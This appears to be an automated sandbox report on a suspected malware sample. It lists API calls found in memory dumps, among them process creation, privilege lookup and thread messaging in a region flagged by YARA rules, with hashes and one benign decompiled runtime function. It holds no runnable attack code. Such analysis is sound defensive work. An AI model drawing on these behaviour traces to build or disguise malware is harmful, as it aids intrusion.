                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                                        • Instruction ID: 25854b0b8d1deee2f8becfdf3e8d12c713dcd7bb91374b2591a424b5721ce167
                                                        • Opcode Fuzzy Hash: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                                        • Instruction Fuzzy Hash: 0E9002A5A12000032505B559470490B004697E5395351C026F1006554CD765D8616161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                                        • Instruction ID: d2e8219d2408e192d895e8cc01c7d3351ec02bd1baeb8e6496091aeeb68956f8
                                                        • Opcode Fuzzy Hash: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                                        • Instruction Fuzzy Hash: 4A9002F1A0200402F54071598404B4A000597E0345F51C016E5055558E879DDDD576A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                                        • Instruction ID: c339d4c8c97a4b88c6520bad80b0b1d19dddd022c79fe5d5c168e466d476648c
                                                        • Opcode Fuzzy Hash: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                                        • Instruction Fuzzy Hash: EA9002E1A0300003650571598414A1A400A97F0245B51C026E1005594DC669D8917165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                                        • Instruction ID: 622d48a62d56f842993ab99418b6872dcddc8964fbe7a150500696cb289de61a
                                                        • Opcode Fuzzy Hash: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                                        • Instruction Fuzzy Hash: 2D9002E1B4200442F50071598414F0A0005D7F1345F51C01AE1055558D875DDC527166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                                        • Instruction ID: 7a12b67ddab4c685899aa4434969cf76edf15a34fb0a6d2dfa089d28bfa8a8df
                                                        • Opcode Fuzzy Hash: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                                        • Instruction Fuzzy Hash: E19002B1A0604842F54071598404E4A001597E0349F51C016E0055698D9769DD55B6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                                        • Instruction ID: 6171155117bfeba4d637a41c5cdc5bb2c99b1c86dad1654c02d14e5b99da8418
                                                        • Opcode Fuzzy Hash: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                                        • Instruction Fuzzy Hash: E69002A1A1280042F60075698C14F0B000597E0347F51C11AE0145558CCA59D8616561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                                        • Instruction ID: 60d85c9b187e2ba577472cf468c5dc8df35fe0c1a050a417be2275b4d6a09059
                                                        • Opcode Fuzzy Hash: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                                        • Instruction Fuzzy Hash: 389002B1A0200802F58071598404A4E000597E1345F91C01AE0016658DCB59DA5977E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                                        • Instruction ID: ceab0b7114527c180aa9941c8aa1d651ca48c6b4b4cf47fe8f2d1aeb5bce9b29
                                                        • Opcode Fuzzy Hash: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                                        • Instruction Fuzzy Hash: 259002B1A0200842F50071598404F4A000597F0345F51C01BE0115658D8759D8517561
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                                        • Instruction ID: 16e70616a41e19cdcfe40cceadafe7261ad661d366066f726d6bbaf74c245d62
                                                        • Opcode Fuzzy Hash: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                                        • Instruction Fuzzy Hash: 8C9002B1A0208802F5107159C404B4E000597E0345F55C416E441565CD87D9D8917161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                                        • Instruction ID: 14f3254150f1a38f278bad61f68470947f4bc3922214a73087232847030cf316
                                                        • Opcode Fuzzy Hash: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                                        • Instruction Fuzzy Hash: B19002B1A0200402F50075999408A4A000597F0345F51D016E5015559EC7A9D8917171
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                                        • Instruction ID: 046875a2af4da5f745986d3ff80a18d682ffdf5539a2856ffff6eb026109585e
                                                        • Opcode Fuzzy Hash: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                                        • Instruction Fuzzy Hash: 429002B1B1214402F5107159C404B0A000597E1245F51C416E081555CD87D9D8917162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                                        • Instruction ID: c923951a4b07bcf7c8b5831fc7f34386d223c660122f4c1564ee1d2b77944186
                                                        • Opcode Fuzzy Hash: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                                        • Instruction Fuzzy Hash: 5C9002A9A1300002F58071599408A0E000597E1246F91D41AE000655CCCA59D8696361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`$}>|2
                                                        • API String ID: 3298025750-26112343
                                                        • Opcode ID: 7e62f351ab6f0bae52cd4e33778da8d85c9cee534dbade49ef896c04c033e8bf
                                                        • Instruction ID: aee39d670ad14b017b876a266474a7b0f05e7295417b84b0b879e458f9b8670d
                                                        • Opcode Fuzzy Hash: 7e62f351ab6f0bae52cd4e33778da8d85c9cee534dbade49ef896c04c033e8bf
                                                        • Instruction Fuzzy Hash: 51E06DB22002246BD718DF59CC84ED7379AAF88360F214665FD599B242C631E801CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: b7f017036a826d5a203e103d8b19d66928685623490a8dc0b1bbda4154f460c2
                                                        • Instruction ID: 781468f5d98390b579172d05d9d9debfb39b16207a3113e02c5a07eaad386ef2
                                                        • Opcode Fuzzy Hash: b7f017036a826d5a203e103d8b19d66928685623490a8dc0b1bbda4154f460c2
                                                        • Instruction Fuzzy Hash: 91014FB52002246BD725DF99CC84ED73769EF88360F05855AFD4CAF242C631E911CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02443AF8), ref: 0245A07D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0244834A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0244836B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0245A114
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0244F1A2,0244F1A2,?,00000000,?,?), ref: 0245A1E0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02454506,?,02454C7F,02454C7F,?,02454506,?,?,?,?,?,00000000,00000000,?), ref: 0245A03D
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0244F1A2,0244F1A2,?,00000000,?,?), ref: 0245A1E0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,02448CF4,?), ref: 0244F6CB
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 53%
                                                        			E044CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                        				void* _t7;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t10;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr _t14;
                                                        				intOrPtr* _t15;
                                                        
                                                        				_t13 = __edx;
                                                        				_push(_a4);
                                                        				_t14 =  *[fs:0x18];
                                                        				_t15 = _t12;
                                                        				_t7 = E0447CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                        				_push(_t13);
                                                        				E044C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                        				_t9 =  *_t15;
                                                        				if(_t9 == 0xffffffff) {
                                                        					_t10 = 0;
                                                        				} else {
                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                        				}
                                                        				_push(_t10);
                                                        				_push(_t15);
                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                        				return E044C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                        			}


                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044CFDFA
                                                        Strings
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044CFE01
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044CFE2B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%